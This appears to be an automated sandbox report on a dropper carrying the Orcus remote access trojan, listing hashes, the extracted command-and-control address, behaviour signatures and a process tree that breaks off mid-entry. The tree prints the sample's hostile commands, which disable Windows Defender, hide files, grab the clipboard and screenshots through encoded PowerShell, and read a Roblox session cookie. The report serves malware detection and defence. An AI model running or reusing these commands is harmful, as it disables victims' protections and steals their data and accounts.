Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-01-2025 01:01

General

  • Target

    554ba820fd72b48db8cfd0c6f8c56e20675f993408df0504e2d80c2f68dbe631.exe

  • Size

    16.5MB

  • MD5

    ded6f7fee10797b02f8876dad0c84ae6

  • SHA1

    ca2e5e3aa7463fc33444b7a4de5dfa33b3efc83d

  • SHA256

    554ba820fd72b48db8cfd0c6f8c56e20675f993408df0504e2d80c2f68dbe631

  • SHA512

    565fbd16d8b6ee43b61ea8f5e0d5284c9823119b6f7740aa182ecd18c032b2148e8a8ef88661fcd8a89d25e4e0bfaf9fdfc4104d6c76cbfaeab85984babbaca2

  • SSDEEP

    393216:z0EjcTK84e3km6NsyYSzOshouIkPftRL54lRC9l1dy1JC:wE4CsAsyYSawouTtRL/y

Malware Config

Extracted

Family

orcus

Botnet

FunPay

C2

31.44.184.52:44657

Mutex

sudo_vm3jypee5e4wpgyaqsjreb4akskikm0b

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %appdata%\privategamebase\Discord.exe

  • reconnect_delay

    10000

  • registry_keyname

    Sudik

  • taskscheduler_taskname

    sudik

  • watchdog_path

    AppData\aga.exe

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus family
  • Orcus main payload 1 IoCs
  • Orcurs Rat Executable 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 30 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Control Panel 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\554ba820fd72b48db8cfd0c6f8c56e20675f993408df0504e2d80c2f68dbe631.exe
    "C:\Users\Admin\AppData\Local\Temp\554ba820fd72b48db8cfd0c6f8c56e20675f993408df0504e2d80c2f68dbe631.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Users\Admin\AppData\Local\Temp\SandeLLo CHECKER.exe
      "C:\Users\Admin\AppData\Local\Temp\SandeLLo CHECKER.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Modifies Control Panel
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:60
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\SandeLLo CHECKER.exe" SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1736575899 "
        3⤵
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        PID:3188
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4200
      • C:\Users\Admin\AppData\Local\Temp\Built.exe
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1312
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1500
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:828
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2944
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4884
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4376
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            PID:3712
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2400
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
              PID:1760
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              5⤵
                PID:3784
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:916
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                5⤵
                  PID:1816
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3260
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  5⤵
                  • Detects videocard installed
                  PID:3956
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2476
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  5⤵
                  • Detects videocard installed
                  PID:5044
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                4⤵
                • Hide Artifacts: Hidden Files and Directories
                PID:4108
                • C:\Windows\system32\attrib.exe
                  attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:2232
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‏.scr'"
                4⤵
                  PID:3344
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‏.scr'
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3520
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  4⤵
                    PID:2644
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      5⤵
                      • Enumerates processes with tasklist
                      PID:1296
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    4⤵
                      PID:4616
                      • C:\Windows\system32\tasklist.exe
                        tasklist /FO LIST
                        5⤵
                        • Enumerates processes with tasklist
                        PID:4524
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                      4⤵
                        PID:4004
                        • C:\Windows\System32\Wbem\WMIC.exe
                          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                          5⤵
                            PID:2772
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                          4⤵
                          • Clipboard Data
                          PID:1992
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Get-Clipboard
                            5⤵
                            • Clipboard Data
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5068
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          4⤵
                            PID:3264
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              5⤵
                              • Enumerates processes with tasklist
                              PID:2764
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            4⤵
                              PID:3832
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                5⤵
                                  PID:3888
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "systeminfo"
                                4⤵
                                  PID:4964
                                  • C:\Windows\system32\systeminfo.exe
                                    systeminfo
                                    5⤵
                                    • Gathers system information
                                    PID:4500
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                  4⤵
                                    PID:4100
                                    • C:\Windows\system32\reg.exe
                                      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                      5⤵
                                        PID:3756
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                      4⤵
                                        PID:4016
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3968
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bailwqo4\bailwqo4.cmdline"
                                            6⤵
                                              PID:4320
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA884.tmp" "c:\Users\Admin\AppData\Local\Temp\bailwqo4\CSCF111F86E1F554A0E9FBA4A6232B1B06F.TMP"
                                                7⤵
                                                  PID:2412
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            4⤵
                                              PID:4956
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                5⤵
                                                  PID:1636
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                4⤵
                                                  PID:3292
                                                  • C:\Windows\system32\attrib.exe
                                                    attrib -r C:\Windows\System32\drivers\etc\hosts
                                                    5⤵
                                                    • Drops file in Drivers directory
                                                    • Views/modifies file attributes
                                                    PID:3736
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  4⤵
                                                    PID:3172
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      5⤵
                                                        PID:4880
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                      4⤵
                                                        PID:1708
                                                        • C:\Windows\system32\attrib.exe
                                                          attrib +r C:\Windows\System32\drivers\etc\hosts
                                                          5⤵
                                                          • Drops file in Drivers directory
                                                          • Views/modifies file attributes
                                                          PID:2952
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        4⤵
                                                          PID:4712
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            5⤵
                                                              PID:3756
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            4⤵
                                                              PID:3528
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                5⤵
                                                                  PID:3260
                                                                • C:\Windows\system32\tasklist.exe
                                                                  tasklist /FO LIST
                                                                  5⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:708
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                4⤵
                                                                  PID:4100
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    5⤵
                                                                      PID:3160
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                    4⤵
                                                                      PID:3452
                                                                      • C:\Windows\system32\tree.com
                                                                        tree /A /F
                                                                        5⤵
                                                                          PID:1848
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                        4⤵
                                                                          PID:3388
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
